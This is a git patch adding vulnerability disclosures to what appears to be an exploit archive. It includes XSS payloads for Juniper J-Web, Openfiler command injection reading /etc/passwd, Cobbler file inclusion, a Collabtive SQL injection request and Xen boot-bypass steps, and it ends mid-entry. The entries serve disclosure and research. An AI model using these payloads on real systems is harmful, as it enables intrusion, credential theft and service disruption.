From cd337ecfafd22c3550d079e9510a68824853af2f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 May 2014 04:36:25 +0000 Subject: [PATCH] Updated 05_10_2014 --- files.csv | 23 ++++++++ platforms/hardware/remote/33257.txt | 12 +++++ platforms/hardware/remote/33258.txt | 20 +++++++ platforms/hardware/remote/33259.txt | 53 ++++++++++++++++++ platforms/hardware/remote/33260.txt | 14 +++++ platforms/hardware/remote/33261.txt | 18 +++++++ platforms/hardware/remote/33265.js | 34 ++++++++++++ platforms/hardware/webapps/33247.txt | 40 ++++++++++++++ platforms/hardware/webapps/33248.txt | 63 ++++++++++++++++++++++ platforms/java/webapps/33254.txt | 9 ++++ platforms/linux/dos/33222.txt | 9 ++++ platforms/linux/dos/33223.txt | 9 ++++ platforms/linux/dos/33224.txt | 9 ++++ platforms/linux/local/33255.txt | 14 +++++ platforms/multiple/dos/33182.txt | 10 ++++ platforms/php/webapps/33249.txt | 81 ++++++++++++++++++++++++++++ platforms/php/webapps/33252.txt | 45 ++++++++++++++++ platforms/php/webapps/33256.txt | 9 ++++ platforms/php/webapps/33262.txt | 11 ++++ platforms/php/webapps/33266.txt | 9 ++++ platforms/php/webapps/33267.txt | 9 ++++ platforms/windows/remote/33172.txt | 10 ++++ platforms/windows/remote/33263.html | 12 +++++ platforms/windows/remote/33264.txt | 49 +++++++++++++++++ 24 files changed, 572 insertions(+) create mode 100755 platforms/hardware/remote/33257.txt create mode 100755 platforms/hardware/remote/33258.txt create mode 100755 platforms/hardware/remote/33259.txt create mode 100755 platforms/hardware/remote/33260.txt create mode 100755 platforms/hardware/remote/33261.txt create mode 100755 platforms/hardware/remote/33265.js create mode 100755 platforms/hardware/webapps/33247.txt create mode 100755 platforms/hardware/webapps/33248.txt create mode 100755 platforms/java/webapps/33254.txt create mode 100755 platforms/linux/dos/33222.txt create mode 100755 platforms/linux/dos/33223.txt create mode 100755 platforms/linux/dos/33224.txt create mode 100755 platforms/linux/local/33255.txt create mode 100755 platforms/multiple/dos/33182.txt create mode 100755 platforms/php/webapps/33249.txt create mode 100755 platforms/php/webapps/33252.txt create mode 100755 platforms/php/webapps/33256.txt create mode 100755 platforms/php/webapps/33262.txt create mode 100755 platforms/php/webapps/33266.txt create mode 100755 platforms/php/webapps/33267.txt create mode 100755 platforms/windows/remote/33172.txt create mode 100755 platforms/windows/remote/33263.html create mode 100755 platforms/windows/remote/33264.txt diff --git a/files.csv b/files.csv index 151e812c9..425edb007 100755 --- a/files.csv +++ b/files.csv @@ -29905,6 +29905,7 @@ id,file,description,date,author,platform,type,port 33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0 +33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String Vulnerability",2009-08-17,"Luigi Auriemma",windows,remote,0 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)",2007-02-07,trevordixon,windows,dos,0 33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0 @@ -29913,6 +29914,7 @@ id,file,description,date,author,platform,type,port 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 +33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service Vulnerability",2009-08-23,"Luigi Auriemma",multiple,dos,0 33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0 33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0 33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0 @@ -29950,6 +29952,9 @@ id,file,description,date,author,platform,type,port 33219,platforms/php/webapps/33219.txt,"Planet 2.0 HTML Injection Vulnerability",2009-09-11,"Steve Kemp",php,webapps,0 33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 'NOOP' Command Denial Of Service Vulnerability",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 'gxmim1.dll' ActiveX Control Buffer Overflow Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0 +33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion DoS",2009-09-15,"Buildbot Builder",linux,dos,0 +33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote DoS",2009-09-15,"Buildbot Builder",linux,dos,0 +33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote DoS",2009-09-15,"Buildbot Builder",linux,dos,0 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 @@ -29968,3 +29973,21 @@ id,file,description,date,author,platform,type,port 33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0 +33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 +33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0 +33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0 +33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0 +33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0 +33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0 +33256,platforms/php/webapps/33256.txt,"e107 0.7.x 'CAPTCHA' Security Bypass Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2009-09-28,MustLive,php,webapps,0 +33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J-Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface /diagnose Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface /configuration Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface /scripter.php Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface Multiple Script m[] Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 'p' Parameter Directory Traversal Vulnerability",2009-09-29,"Infected Web",php,webapps,0 +33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 +33264,platforms/windows/remote/33264.txt,"Internet Explorer 8 X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 +33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 +33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0 +33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0 diff --git a/platforms/hardware/remote/33257.txt b/platforms/hardware/remote/33257.txt new file mode 100755 index 000000000..eb92d3fc4 --- /dev/null +++ b/platforms/hardware/remote/33257.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/36537/info + +Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects the following: + +J-Web 8.5R1.14 +J-Web 9.0R1.1 + +http://www.example.com/" \ No newline at end of file diff --git a/platforms/hardware/remote/33258.txt b/platforms/hardware/remote/33258.txt new file mode 100755 index 000000000..ef7e2419e --- /dev/null +++ b/platforms/hardware/remote/33258.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/36537/info + +Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects the following: + +J-Web 8.5R1.14 +J-Web 9.0R1.1 + +Program URI :- http://www.example.com/diagnose?m[]=pinghost + +Vulnerable Parameter :- Remote Host + + +Program URI :- http://www.example.com/diagnose?m[]=traceroute + +Vulnerable Parameter :- Remote Host + \ No newline at end of file diff --git a/platforms/hardware/remote/33259.txt b/platforms/hardware/remote/33259.txt new file mode 100755 index 000000000..085510098 --- /dev/null +++ b/platforms/hardware/remote/33259.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/36537/info + +Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects the following: + +J-Web 8.5R1.14 +J-Web 9.0R1.1 + +Program URI :- http://www.example.com/configuration?m[]=wizards&m[]=rpm + +POST +current-page=main&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&probe-owner-list-hidden=false&probe-owner-delete-hidden=true&probe-limit-hidden=false&probe-limit=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&probe-server-tcp-hidden=false&probe-server-tcp=&probe-server-udp-hidden=false&probe-server-udp=&ok-button=++OK++ + +Program URI :- http://www.example.com/configuration?m[]=wizards&m[]=firewall-acl&m[]=firewall-filters + +POST +current-page=firewall-filters&wizard-next=firewall-filter-term&wizard-mode=new-item&wizard-args=&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=firewall-filters&filteraclsummary-hidden=false&wizard-tab-page=firewall-filter-term&wizard-tab-selected=source&pager-new-identifier=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pager-new-location=end&term-name-search=&num-per-page=25&num-per-page=25&num-per-page=25 + +Pogram URI :- http://www.example.com/configuration?m[]=wizards&m[]=cos&m[]=cos-interfaces + +POST +current-page=cos-physical-interfaces-edit&wizard-next=cos-logical-interfaces-edit&wizard-mode=add&wizard-args=%7Bcos-physical-interface-name%7D&wizard-ids=%7Bcos-physical-interface-name%7D&wizard-previous=cos-physical-interfaces-edit&cos-physical-interface-name-hidden=false&cos-physical-interface-name=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cos-physical-interface-scheduler-map-hidden=false&cos-physical-interface-scheduler-map=&cos-logical-interfaces-list-hidden=false&cos-logical-interfaces-delete-hidden=true&cos-physical-interface-scheduler-map= + +PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=snmp + +POST +current-page=main&wizard-next=snmp-community&wizard-mode=edit&wizard-args=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-ids=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&wizard-previous=main&contact-hidden=false&contact=&description-hidden=false&description=&engineid-hidden=false&engineid=&location-hidden=false&location=&override-hidden=false&override=&communities-hidden=false&snmp-community-delete-hidden=true&trapgroups-hidden=false&snmp-trap-group-delete-hidden=true&health-monitor-enable-original=off&health-monitor-enable-hidden=false&interval-hidden=false&rising-threshold-non-jseries-hidden=false&falling-threshold-non-jseries-hidden=false&community-checked%5B%5D=off&health-monitor-enable=off&interval=&rising-threshold-non-jseries=&falling-threshold-non-jseries= + +PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=users + +POST +current-page=users&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&username-hidden=false&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&fullname-hidden=false&fullname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&class-hidden=false&class=unauthorized&loginpassword-hidden=false&loginpassword=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&loginpassword-verify=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++&class=unauthorized + +PROGRAM URI :- http://www.example.com/configuration?m[]=wizards&m[]=https + +POST +current-page=local-cert&wizard-next=&wizard-mode=&wizard-args=&wizard-ids=&wizard-previous=&certname-hidden=false&certname=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&certbody-hidden=false&certbody=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ok-button=++OK++ + + +POST /configuration?m[]=wizards&m[]=https HTTP/1.1 +Host: www.example.com +Accept: */* +Accept-Language: en +User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) +Connection: close +Referer: http://www.example.com/configuration?m[]=wizards&m[]=https&start=true +Cookie: PHPSESSID=faf6133c44481c24b61a04f4c0ef57be; +Content-Type: application/x-www-form-urlencoded +Content-Length: 782 +https-allifls-hidden=false&https-interfaces-hidden=false&https-cert-hidden=false&local-cert-delete-hidden=true&wizard-next=b7777">095b2419adf&https-allifls=on&https-allifls-original=on&xnmssltoggle=on&http-allifls-hidden=false&http-interfaces-hidden=false&certs-hidden=false&right-http-interfaces-duallist%5b%5d=lo0.16384&http-allifls=on&http-allifls-original=off&wizard-ids=¤t-page=main&http-enable-hidden=false&text-hidden=false&wizard-args=&wizard-previous=&xnmssltoggle-hidden=false&httpstoggle-hidden=false&right-https-interfaces-duallist%5b%5d=lo0.16384&left-http-interfaces-duallist%5b%5d=em0.0&http-enable-original=on&httpstoggle-original=off&apply-button=Apply&xnmssltoggle-original=off&xnmssl-cert-hidden=false&http-enable=on&httpstoggle=on&wizard-mode=&http-interfaces-original=Array \ No newline at end of file diff --git a/platforms/hardware/remote/33260.txt b/platforms/hardware/remote/33260.txt new file mode 100755 index 000000000..cf6e7295e --- /dev/null +++ b/platforms/hardware/remote/33260.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/36537/info + +Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects the following: + +J-Web 8.5R1.14 +J-Web 9.0R1.1 + +11. http://www.example.com/scripter.php?act=">&debug=1&ifid=1&refresh-time=1& +12. http://www.example.com/scripter.php?refresh-time="> +13. http://www.example.com/scripter?act=header&ifid=')">& \ No newline at end of file diff --git a/platforms/hardware/remote/33261.txt b/platforms/hardware/remote/33261.txt new file mode 100755 index 000000000..762843384 --- /dev/null +++ b/platforms/hardware/remote/33261.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/36537/info + +Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects the following: + +J-Web 8.5R1.14 +J-Web 9.0R1.1 + +http://www.example.com/monitor?m[]='> +http://www.example.com/manage?m[]='> +http://www.example.com/events?m[]='> +http://www.example.com/configuration?m[]='> +http://www.example.com/alarms?m[]='> +http://www.example.com/?m[]='> +http://www.example.com/?action=browse&m[]=">&path=/var/crash& \ No newline at end of file diff --git a/platforms/hardware/remote/33265.js b/platforms/hardware/remote/33265.js new file mode 100755 index 000000000..88849b04d --- /dev/null +++ b/platforms/hardware/remote/33265.js @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/36592/info + +Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to execute arbitrary script code. Successful exploits can compromise the application. + +Versions prior to WebOS 1.2 are vulnerable. + + + diff --git a/platforms/hardware/webapps/33247.txt b/platforms/hardware/webapps/33247.txt new file mode 100755 index 000000000..36eb4dbe6 --- /dev/null +++ b/platforms/hardware/webapps/33247.txt @@ -0,0 +1,40 @@ +# Exploit Title: Arbitrary Code Execution in Openfiler + +# Exploit author: Dolev Farhi @f1nhack + +# Date 07/05/2014 + +# Vendor homepage: http://www.openfiler.com + +# Affected Software version: 2.99.1 + +# Alerted vendor: 7.5.14 + + +Software Description +===================== +Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based +Storage Area Networking functionality in a single cohesive framework. + + + +Vulnerability Description +========================= +Arbitrary code execution + + +Steps to reproduce / PoC: +========================= +1.1. Login to Openfiler dashboard. + +1.2. Under system tab -> Hostname + +1.3. Enter any shell command you desire using the backticks ` ` + + e.g. `cat /etc/passwd` + +1.4. the code reflects in the hostname value space + + + + <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be \ No newline at end of file diff --git a/platforms/hardware/webapps/33248.txt b/platforms/hardware/webapps/33248.txt new file mode 100755 index 000000000..6a0f82cbc --- /dev/null +++ b/platforms/hardware/webapps/33248.txt @@ -0,0 +1,63 @@ +# Exploit Title: Multiple persistent XSS in Openfiler + +# Exploit author: Dolev Farhi @f1nhack + +# Date 07/05/2014 + +# Vendor homepage: http://www.openfiler.com + +# Affected Software version: 2.99.1 + +# Alerted vendor: 7.5.14 + + +Software Description +===================== +Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based +Storage Area Networking functionality in a single cohesive framework. + + + +Vulnerability Description +========================= +Multiple Persistent Cross Site Scripting + + + +Steps to reproduce / PoC: +========================= +1.1. Login to Openfiler dashboard. + +1.2. Under system tab -> Network Access Configuration create a new NAC + +1.3. Name the NAC + +1.4. Navigate to another tab. + +1.5. Navigate back to System tab + +1.6. the XSS reflects to the window. + + + +2.1. Create a new Volume Group. + +2.2. Create a new Logical Volume with any name you want. + +2.3. in the Description, enter alert("XSS") + +2.4. Click OK. + +2.5. Navigate to "Shares" tab -> XSS + +2.6. Navigate to "Snapshot Shares" -> XSS + +2.7. Navigate to "Existing shares" -> XSS + +2.8. Navigate to "Quota" -> XSS + + + + + + <-> PoC Video: https://www.youtube.com/watch?v=CLG5iS3qU-M&feature=youtu.be \ No newline at end of file diff --git a/platforms/java/webapps/33254.txt b/platforms/java/webapps/33254.txt new file mode 100755 index 000000000..13694a74d --- /dev/null +++ b/platforms/java/webapps/33254.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36513/info + +IBM Lotus Connections is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks + +IBM Lotus Connections 2.0.1 is affected; other versions may be vulnerable as well. + +https://www.example.com/profiles/html/simpleSearch.do?name=&lang=en \ No newline at end of file diff --git a/platforms/linux/dos/33222.txt b/platforms/linux/dos/33222.txt new file mode 100755 index 000000000..617a30838 --- /dev/null +++ b/platforms/linux/dos/33222.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36408/info + +Wireshark is prone to multiple denial-of-service vulnerabilities. + +Exploiting these issues may allow attackers to crash the application and deny service to legitimate users. + +These issues affect Wireshark 0.99.6 through 1.2.1. + +http://www.exploit-db.com/sploits/33222.pcap \ No newline at end of file diff --git a/platforms/linux/dos/33223.txt b/platforms/linux/dos/33223.txt new file mode 100755 index 000000000..d0eb1fecc --- /dev/null +++ b/platforms/linux/dos/33223.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36408/info + +Wireshark is prone to multiple denial-of-service vulnerabilities. + +Exploiting these issues may allow attackers to crash the application and deny service to legitimate users. + +These issues affect Wireshark 0.99.6 through 1.2.1. + +http://www.exploit-db.com/sploits/33223.zip \ No newline at end of file diff --git a/platforms/linux/dos/33224.txt b/platforms/linux/dos/33224.txt new file mode 100755 index 000000000..4f6702b16 --- /dev/null +++ b/platforms/linux/dos/33224.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36408/info + +Wireshark is prone to multiple denial-of-service vulnerabilities. + +Exploiting these issues may allow attackers to crash the application and deny service to legitimate users. + +These issues affect Wireshark 0.99.6 through 1.2.1. + +http://www.exploit-db.com/sploits/33224.pcap \ No newline at end of file diff --git a/platforms/linux/local/33255.txt b/platforms/linux/local/33255.txt new file mode 100755 index 000000000..e959d7c36 --- /dev/null +++ b/platforms/linux/local/33255.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/36523/info + +Xen is prone to a local authentication-bypass vulnerability. + +A local attacker with physical access to an affected host can exploit this issue to bypass authentication and modify the 'grub.conf' file. This may aid in a complete compromise of the affected system. + +Xen 3.0.3, 3.3.0, and 3.3.1 are affected; other versions may also be vulnerable. + +xm create -c guest +press space bar to stop the grub count down +press e to edit +select the kernel line and press e +Append a "1" to the end of the kernel line and press return +press "b" to boot \ No newline at end of file diff --git a/platforms/multiple/dos/33182.txt b/platforms/multiple/dos/33182.txt new file mode 100755 index 000000000..1e916e856 --- /dev/null +++ b/platforms/multiple/dos/33182.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/36114/info + +Live For Speed S2 is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. + +An attacker could exploit this issue to restart races on vulnerable servers, resulting in a denial-of-service condition. + +Live For Speed S2 Z13 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/33182-1.zip +http://www.exploit-db.com/sploits/33182-2.zip \ No newline at end of file diff --git a/platforms/php/webapps/33249.txt b/platforms/php/webapps/33249.txt new file mode 100755 index 000000000..7460ce841 --- /dev/null +++ b/platforms/php/webapps/33249.txt @@ -0,0 +1,81 @@ +Vulnerability title: SQL Injection / SQL Error message in Collabtive +application (CVE-2014-3246) +CVE: CVE-2014-3246 (cordinated with +Vendor: Collabtive +Product: Collabtive (Open Source Project Management Software) +Affected version: 1.12 +Fixed version: 2.0 +Reported by: Deepak Rathore +Severity: Critical +URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482 +Affected Users: Authenticated users +Affected parameter(s): folder + +Issue details: The folder parameter appears to be vulnerable to SQL +injection attacks. The payload 1%3d was submitted in the folder parameter, +and a database error message was returned. You should review the contents +of the error message, and the application's handling of other input, to +confirm whether a vulnerability is present. The database appears to be +MySQL. + +HTTP request: +GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 +Host: collabtive.o-dyn.de +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 +Firefox/29.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Prototype-Version: 1.6.0.3 +Referer: +http://xxx/managefile.php?action=showproject&id=2482 +Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; +PHPSESSID=ba83d29aab270a7926ea1be2e1f830be +Connection: keep-alive + +Steps to replicate: +1. Login into application +2. Go to "Desktop" tab and click on "Add project" +3. Fill the project details in the project form and click on "Add" button +4. After creating a project go to "Files" tab and Intercept the request +5. At "manageajax.php" file, replace "folder" parameter value with "1%3d" +===================== +Original Request +===================== +GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1 +Host: collabtive.o-dyn.de +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 +Firefox/29.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Prototype-Version: 1.6.0.3 +Referer: +http://xxx/managefile.php?action=showproject&id=2482 +Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; +PHPSESSID=ba83d29aab270a7926ea1be2e1f830be +Connection: keep-alive +====================== +Attack Request +====================== +GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 +Host: collabtive.o-dyn.de +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 +Firefox/29.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Prototype-Version: 1.6.0.3 +Referer: +http://xxx/managefile.php?action=showproject&id=2482 +Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; +PHPSESSID=ba83d29aab270a7926ea1be2e1f830be +Connection: keep-alive +====================== +6. Forward manipulated request to server and wait for response in browser +7. SQL Error message is the proof of vulnerability. + +Tools used: Burp Suite proxy, Mozilla Firefox browser diff --git a/platforms/php/webapps/33252.txt b/platforms/php/webapps/33252.txt new file mode 100755 index 000000000..058466053 --- /dev/null +++ b/platforms/php/webapps/33252.txt @@ -0,0 +1,45 @@ +# Exploit Title: Local File Inclusion vulnerability in cobbler + +# Exploit author: Dolev Farhi @f1nhack + +# Date 07/05/2014 + +# Vendor homepage: http://www.cobblerd.org + +# Affected Software version: 2.4.x - 2.6.x + +# Alerted vendor: 7.5.14 + + +Software Description +===================== +Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones. +Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more. + + + +Vulnerability Description +========================= +Local file inclusion + + +Steps to reproduce / PoC: +========================= +1.1. Login to Cobbler WebUI: http://ip.add.re.ss/cobbler_web/ + +1.2. Under Profiles -> Create New Profile + +1.3. Create a new profile with some name, assign a distribution to it. + +1.4: in Kickstart value, enter /etc/passwd + +1.5. Save the profile + +1.6. Navigate again to Profiles page + +1.7. press on "View Kickstart" next to the new profile created. + +1.8. /etc/passwd content is shown. + + + <-> PoC Video: https://www.youtube.com/watch?v=vuBaoQUFEYQ&feature=youtu.be \ No newline at end of file diff --git a/platforms/php/webapps/33256.txt b/platforms/php/webapps/33256.txt new file mode 100755 index 000000000..8d0e7ed79 --- /dev/null +++ b/platforms/php/webapps/33256.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36532/info + +e107 is prone to a security-bypass vulnerability and multiple cross-site scripting vulnerabilities. + +Successfully exploiting the security-bypass issue will allow an attacker to 